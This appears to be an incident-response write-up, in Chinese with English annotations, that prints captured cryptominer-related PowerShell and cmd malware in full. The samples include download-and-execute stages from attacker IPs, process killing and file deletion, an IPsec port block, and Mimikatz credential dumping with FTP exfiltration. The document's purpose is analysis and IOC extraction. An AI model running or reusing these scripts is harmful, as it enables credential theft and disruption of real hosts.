取樣時, 後面綠色的部分為死機狀態或已刪檔, 故沒能擷取內容做紀錄
S.ps1的內容
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
523Bytes 檔案的內容 (下列程式碼中的 #58、#59 應為擷取時殘留的 HTML 字元實體, 分別對應 `:` 與 `;`, 例如 `$env#58windir` 即 `$env:windir`)
# Sample "523Bytes": two one-liners that look for processes named svchost.exe /
# conhost.exe whose ExecutablePath is NOT the legitimate %windir%\system32 or
# %windir%\syswow64 location. The "#58" / "#59" sequences appear to be HTML-entity
# residue for ":" and ";" (so "$env#58windir" reads as "$env:windir" and "#59" is a
# statement separator) — presumably an extraction artifact, verify against the
# captured file before using these exact bytes as an IOC.
#
# Line 1: every svchost.exe outside the system paths is terminated and its image
# file is deleted with -Force.
gwmi -Class 'Win32_Process' -Filter "Name='svchost.exe'"|%{if(($_.ExecutablePath -ne ($env#58windir+'\system32\svchost.exe')) -and ($_.ExecutablePath -ne ($env#58windir+'\syswow64\svchost.exe'))){$_.Terminate()#59del -LiteralPath $_.ExecutablePath -Force#59}}
# Line 2: same path check for conhost.exe, but instead of deleting the image it
# waits 2 s and then starts c:\windows\temp\conhost.exe — a binary living in
# %SystemRoot%\Temp, not the legitimate conhost location. Treat
# c:\windows\temp\conhost.exe as an artifact to collect/hash. The pattern (kill the
# non-system copy, relaunch a copy from Temp) looks like competitor cleanup plus
# self-restart, but the intent beyond what the code shows is inferred.
gwmi -Class 'Win32_Process' -Filter "Name='conhost.exe'"|%{if(($_.ExecutablePath -ne ($env#58windir+'\system32\conhost.exe')) -and ($_.ExecutablePath -ne ($env#58windir+'\syswow64\conhost.exe'))){$_.Terminate()#59sleep -s 2#59start-process c#58\windows\temp\conhost.exe#59}}
s.txt的內容
# Sample "s.txt": downloads a kill-list (l.txt, shown further down in this page),
# kills/deletes the listed processes and files, removes a named WMI event
# subscription, then fetches and executes a second stage from another host.
# Network IOCs in this block: 139.5.177.19 (l.txt) and 79.124.78.127 (up.txt).
$url="http://139.5.177.19/l.txt";
$web = New-Object System.Net.WebClient;
# Plain-HTTP fetch of the list; one entry per CRLF-separated line.
$text = $web.DownloadString($url);
$list=$text.trim().split("`r`n",[StringSplitOptions]::RemoveEmptyEntries);
for($i=0;$i -lt $list.count;$i++){
# Each line is "<image name>,<full path>,<delete flag>" (see l.txt below).
$line=$list[$i].trim().split(",");
# Kill by process name with the extension stripped (Get-Process names have no
# ".exe"), then again via WMI Terminate() using the full image name.
Get-Process|?{$_.Name -eq ($line[0] -replace "\.[^\.]+$","")}|Stop-Process -Force;
Get-WmiObject Win32_Process -Filter ("name='"+$line[0]+"'")|%{$_.Terminate();}
# Third field "1" means the file at the listed path is removed as well.
if($line[2].toString() -eq "1"){
if(test-path -LiteralPath $line[1]){
Remove-Item -LiteralPath $line[1] -Force;
}
}
}
# Removes a WMI permanent event subscription named "fuckyoumm2" (filter + script
# consumer) from root\subscription. Only the __EventFilter and the
# ActiveScriptEventConsumer are removed here; no __FilterToConsumerBinding removal
# is visible, so during IR also check root\subscription for a leftover binding.
Get-WMIObject -Namespace root\Subscription -Class __EventFilter -Filter "Name='fuckyoumm2_filter'" | Remove-WmiObject -Verbose
Get-WMIObject -Namespace root\Subscription -Class ActiveScriptEventConsumer -Filter "Name='fuckyoumm2_consumer'" | Remove-WmiObject -Verbose
# Second stage: download-and-IEX of up.txt from 79.124.78.127 over plain HTTP.
# Its content is not captured on this page, so what it does is unknown from here.
IEX (New-Object system.Net.WebClient).DownloadString('http://79.124.78.127/up.txt')
s.jpg (偽裝成圖片檔的文字內容)
# Sample "s.jpg": text disguised with an image extension. Most lines shell out to
# cmd.exe; the visible effects are (1) OS info dumped to a relative c.txt,
# (2) a mass taskkill, (3) deletion / ACL denial of specific executables, and
# (4) an IPsec policy that blocks inbound RPC/NetBIOS/SMB ports.
# Writes Win32_OperatingSystem to "c.txt" in the current working directory
# (whatever that is at run time) — an on-disk artifact worth looking for.
Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_OperatingSystem | Out-File c.txt
# Force-kills a long list of image names. Note it includes sqlservr.exe and
# anydesk.exe (legitimate software) and two duplicates (a.exe and win1ogins.exe
# appear twice). The other names are presumably competing miners/tools, but that
# is inferred from naming only.
cmd.exe /c taskkill /f /im help.exe /im doc001.exe /im dhelllllper.exe /im DOC001.exe /im dhelper.exe /im conime.exe /im a.exe /im docv8.exe /im king.exe /im name.exe /im doc.exe /im wodCmdTerm.exe /im win1ogins.exe /im win1ogins.exe /im lsaus.exe /im lsars.exe /im lsacs.exe /im regedit.exe /im lsmsm.exe /im v5.exe /im anydesk.exe /im sqler.exe /im sqlservr.exe /im NsCpuCNMiner64.exe /im NsCpuCNMiner32.exe /im tlscntr.exe /im eter.exe /im lsmo.exe /im lsarr.exe /im convert.exe /im WinSCV.exe /im ctfmonc.exe /im lsmose.exe /im svhost.exe /im secscan.exe /im wuauser.exe /im splwow64.exe /im boy.exe /IM powered.EXE /im systems.exe /im acnom.exe /im regdrv.exe /im mscsuscr.exe /im Pviunc.exe /im Bllianc.exe /im st.exe /im nvidia_update.exe /im dether.exe /im buff2.exe /im a.exe /im lacas.exe /im new.exe /im upsupx.exe /im 84.exe /im las.exe /im sys.exe /im seser.exe /im ercKK.exe /im MDI6MD.exe
# Clears system/hidden/read-only attributes so the next del can succeed, then
# deletes specific binaries under the system directories. These paths are
# file-system IOCs (seser.exe, sys.exe, las.exe, 84.exe, ercKK.exe).
cmd /c attrib -s -h -r c:\windows\syswow64\seser.exe
cmd /c del c:\windows\syswow64\seser.exe
cmd /c del c:\windows\system32\sys.exe
cmd /c del c:\windows\syswow64\las.exe
cmd /c del c:\windows\syswow64\84.exe
# cacls /e /d system: edits the ACL to DENY the account named "system" on every
# .exe in two unusual directories (C:\Windows\IIS and C:\Windows\Fonts\Mysql).
# Those directories are themselves suspicious locations to examine.
cmd /c cacls C:\Windows\IIS\*.exe /e /d system
cmd /c cacls C:\Windows\Fonts\Mysql\*.exe /e /d system
# Wipes all executables from the SYSTEM profile's Roaming AppData and one more
# loose binary in C:\Windows.
cmd /c del C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\*.exe
cmd /c del c:\windows\ercKK.exe
# IPsec policy "win": blocks inbound TCP 135/137/138/139/445 from any source
# (mirrored), then assigns the policy. The netsh commands are joined with "|"
# (a cmd pipeline) rather than "&", so cmd starts them as pipeline stages; each
# netsh still runs, but the relative ordering is not guaranteed by that syntax.
# The filterlist "Allowlist" and filteraction "Allow" are created but never bound
# to a rule. For responders: this policy persists after the script exits and
# blocks legitimate SMB/RPC management access — remove it with
# "netsh ipsec static delete policy name=win" once the host is cleaned.
cmd.exe /c netsh ipsec static delete policy name=win | netsh ipsec static add policy name=win | netsh ipsec static add filterlist name=Allowlist | netsh ipsec static add filterlist name=denylist | netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=135 | netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=137 | netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=138 | netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=139 | netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=445 | netsh ipsec static add filteraction name=Allow action=permit | netsh ipsec static add filteraction name=deny action=block | netsh ipsec static add rule name=deny1 policy=win filterlist=denylist filteraction=deny | netsh ipsec static set policy name=win assign=y
l.txt的內容
lsmose.exe,C:\Windows\debug\lsmose.exe,1
lsmos.exe,C:\Windows\debug\lsmos.exe,1
lsmo.exe,C:\Windows\debug\lsmo.exe,1
csrw.exe,C:\Program Files (x86)\Common Files\csrw.exe,1
csrw.exe,C:\Program Files\Common Files\csrw.exe,1
lsmosee.exe,c:\windows\help\lsmosee.exe,1
csrs.exe,c:\csrs.exe,1
# Final (unnamed) sample: host reconnaissance + credential theft + exfiltration.
# It collects local/public IP, running processes, OS, RAM and CPU info, runs
# Invoke-Mimikatz fetched from GitHub, writes everything to a text file in %TMP%
# and uploads it over plain FTP with hard-coded credentials.
# Network IOCs: 2019.ip138.com (public-IP lookup), raw.githubusercontent.com
# (PowerSploit Invoke-Mimikatz.ps1), 192.187.111.66:21 (FTP exfil, user "up").
$txt=New-Object -TypeName System.Collections.ArrayList;
$localip="";
# Resolves the local host (empty name) and keeps the last IPv4 address found.
[System.Net.Dns]::GetHostAddresses('')|?{$_.AddressFamily -eq "InterNetwork"}|%{$localip=$_.IPAddressToString}
$publicip="";
$client=New-Object "System.Net.WebClient";
# Public IP is scraped from ip138.com's ic.asp page: first "[a.b.c.d]" match.
# Decoded with the system default (ANSI) code page, not UTF-8.
[byte[]]$data=$client.DownloadData("http://2019.ip138.com/ic.asp");
$html=[System.Text.Encoding]::Default.GetString($data);
if($html -match "\[(\d+\.\d+\.\d+\.\d+)\]"){$publicip=$matches[1];}
# Process inventory: image path and full command line of every process.
# The "??:" / "???:" prefixes below are mis-encoded (probably CJK) labels left
# as-is from the capture; they are part of the emitted file content.
$process=gwmi -class "Win32_Process";
foreach($p in $process){
[void]$txt.Add(("??:"+$p.ExecutablePath));
[void]$txt.Add(("???:"+$p.CommandLine));
[void]$txt.Add("");
};
[void]$txt.Add("");
# OS caption + version; $ver is reused later in the output file name.
$os=gwmi -class "Win32_OperatingSystem";
$ver="";
foreach($o in $os){
[void]$txt.Add(("??:"+$o.Caption+"["+$o.Version+"]"));
$ver=$o.Caption+"["+$o.Version+"]";
}
[void]$txt.Add("");
# Capacity of each physical memory module.
$mem=gwmi -class "Win32_PhysicalMemory";
$i=0;
foreach($m in $mem){
[void]$txt.Add(("??"+($i++)+":"+$m.Capacity));
}
[void]$txt.Add("");
# Per-CPU load percentage and name; $load ("12%-7%-...") also ends up in the
# file name, which hints at miner-style interest in spare CPU capacity, though
# that is an inference.
$cpu=gwmi -class "Win32_Processor";
$i=0;
$load="";
foreach($c in $cpu){
[void]$txt.Add(("CPU"+($i++)+":["+$c.LoadPercentage+"%]"+$c.Name));
$load+=($c.LoadPercentage.toString()+"%-");
};
[void]$txt.Add("");
# Credential theft: downloads PowerSploit's Invoke-Mimikatz.ps1 straight from
# GitHub raw and IEXes it in memory (no file on disk for the script itself).
# Detection angle: PowerShell process with an outbound TLS connection to
# raw.githubusercontent.com followed by LSASS access.
Invoke-Expression (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1');
# Runs Invoke-Mimikatz with its default arguments and regex-extracts every
# "Username / Domain / Password" triplet from the output. (What the default
# invocation dumps depends on the fetched script version — presumably logon
# passwords; confirm against that script rather than this page.)
$mm=[regex]::matches((Invoke-Mimikatz),'\* Username :.+\n.+?\* Domain :.+?\n.+?\* Password :.+');
$s="";
foreach($i in $mm){$s+=$i.value.trim()+"`r`n";};
[void]$txt.Add($s);
# Output file in %TMP%, named "<publicip>_<localip>_<OS caption>[<version>]_<cpu loads>.txt".
# Nothing in this block deletes it afterwards, so the plaintext credential dump
# is left behind in %TMP% — a high-value forensic artifact (and one to securely
# wipe during remediation).
$txtfile=($env:tmp)+"\"+$publicip+"_"+$localip+"_"+$ver+"_"+$load.trimend("-")+".txt";
$fs=New-Object System.IO.FileStream($txtfile, [System.IO.FileMode]::Create);
$sw=New-Object System.IO.StreamWriter($fs, [Text.Encoding]::UTF8);
$sw.WriteLine(($txt -join "`r`n"));
$sw.Close();
$fs.Close();
$sw.Dispose();
$fs.Dispose();
# Exfiltration over unencrypted FTP (port 21) with hard-coded credentials
# ("up" / "1433"); the remote file keeps the local file name, so the server side
# is presumably indexed by victim IP. Both the login and the credential dump
# cross the wire in cleartext — a network capture of this session would contain
# the stolen passwords.
$upfile=New-Object System.Io.FileInfo($txtfile);
$ftpip="192.187.111.66";
$ftpport="21";
$ftpusername="up";
$ftppassword="1433";
$ftpclient=[system.net.ftpwebrequest] [system.net.ftpwebrequest]::create("ftp://"+$ftpip+":"+$ftpport+"/"+$upfile.Name);
$ftpclient.UseBinary = $true;
# 5-second timeout; on a blocked/slow upload the request simply fails.
$ftpclient.Timeout = 5*1000;
$ftpclient.Credentials = New-Object System.Net.NetworkCredential($ftpusername,$ftppassword);
$ftpclient.Method=[system.net.WebRequestMethods+ftp]::UploadFile;
$ftpclient.KeepAlive=$false;
# Re-reads the file as text and re-encodes to UTF-8 bytes for the upload.
$sourceStream=New-Object System.Io.StreamReader($upfile.FullName);
$fileContents=[System.Text.Encoding]::UTF8.GetBytes($sourceStream.ReadToEnd());
$sourceStream.Close();
$ftpclient.ContentLength=$fileContents.Length;
$requestStream=$ftpclient.GetRequestStream();
$requestStream.Write($fileContents, 0, $fileContents.Length);
$requestStream.Close();
$response=$ftpclient.GetResponse();
$response.StatusDescription;
$response.Close();
最後這個檔案比較大,可以另存新檔查看內容。注意: 此檔會從 GitHub 下載並執行 Invoke-Mimikatz 擷取帳號密碼, 再以明文 FTP (192.187.111.66:21) 外傳, 且憑證檔會留在 %TMP% 中; 請僅於隔離環境分析, 切勿在正式主機上執行。